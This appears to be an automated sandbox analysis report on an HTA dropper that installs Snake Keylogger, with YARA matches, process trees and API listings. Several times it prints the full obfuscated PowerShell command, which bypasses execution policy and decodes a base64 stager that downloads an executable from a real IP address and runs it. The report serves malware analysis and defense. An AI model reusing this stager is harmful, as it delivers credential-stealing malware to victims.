                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"Jump to behavior
                    Malicious sample detected (through community Yara rule)
                    Source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: This is a third-party compiled AutoIt script.6_2_001B3B3A
                    Source: csoss.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: csoss.exe, 00000006.00000002.1392686190.0000000000264000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_731e3346-5
                    Source: csoss.exe, 00000006.00000002.1392686190.0000000000264000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_8e27c9be-c
                    Source: csoss.exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cc3299f9-7
                    Source: csoss.exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_66d7bdb0-9
                    Source: csoss[1].exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4b1481d3-b
                    Source: csoss[1].exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b02d6f2c-6
                    Powershell drops PE file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csoss.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,6_2_0021A1EF
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00208310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00208310
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002151BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_002151BD
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001DD9756_2_001DD975
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001D21C56_2_001D21C5
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001E62D26_2_001E62D2
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002303DA6_2_002303DA
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001E242E6_2_001E242E
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001D25FA6_2_001D25FA
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0020E6166_2_0020E616
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001BE6A06_2_001BE6A0
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001C66E16_2_001C66E1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001E878F6_2_001E878F
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001C88086_2_001C8808
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001E68446_2_001E6844
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002308576_2_00230857
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002188896_2_00218889
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001DCB216_2_001DCB21
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001E6DB66_2_001E6DB6
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001C6F9E6_2_001C6F9E
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001C30306_2_001C3030
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001D31876_2_001D3187
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001DF1D96_2_001DF1D9
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B12876_2_001B1287
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001D14846_2_001D1484
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001C55206_2_001C5520
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001D76966_2_001D7696
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001C57606_2_001C5760
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001D19786_2_001D1978
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001BFCE06_2_001BFCE0
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001D1D906_2_001D1D90
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001DBDA66_2_001DBDA6
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00237DDB6_2_00237DDB
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001BDF006_2_001BDF00
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001C3FE06_2_001C3FE0
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_017336986_2_01733698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0470C1687_2_0470C168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04707E687_2_04707E68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04704F087_2_04704F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0470A85D7_2_0470A85D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_047019B87_2_047019B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0470CAB07_2_0470CAB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0470C3877_2_0470C387
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04702DD17_2_04702DD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04707E677_2_04707E67
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04704EF87_2_04704EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0470B9E07_2_0470B9E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0470B9DC7_2_0470B9DC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0470CAA27_2_0470CAA2
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: String function: 001B7DE1 appears 35 times
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: String function: 001D8900 appears 42 times
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: String function: 001D0AE3 appears 70 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021A06A GetLastError,FormatMessageW,6_2_0021A06A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002081CB AdjustTokenPrivileges,CloseHandle,6_2_002081CB
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002087E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_002087E1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,6_2_0021B333
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0022EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_0022EE0D
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002283BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,6_2_002283BB
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,6_2_001B4E89
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40fbnimg.0ms.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.00000000022D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.00000000022DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.00000000022C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: needagoodplanforsuccesstogetbackbest.htaVirustotal: Detection: 46%
                    Source: needagoodplanforsuccesstogetbackbest.htaReversingLabs: Detection: 27%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEFD.tmp" "c:\Users\user\AppData\Local\Temp\dkgvurtz\CSCEFC899AF36F541BC9861FF65BE4F3BB.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csoss.exe "C:\Users\user\AppData\Roaming\csoss.exe"
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csoss.exe"
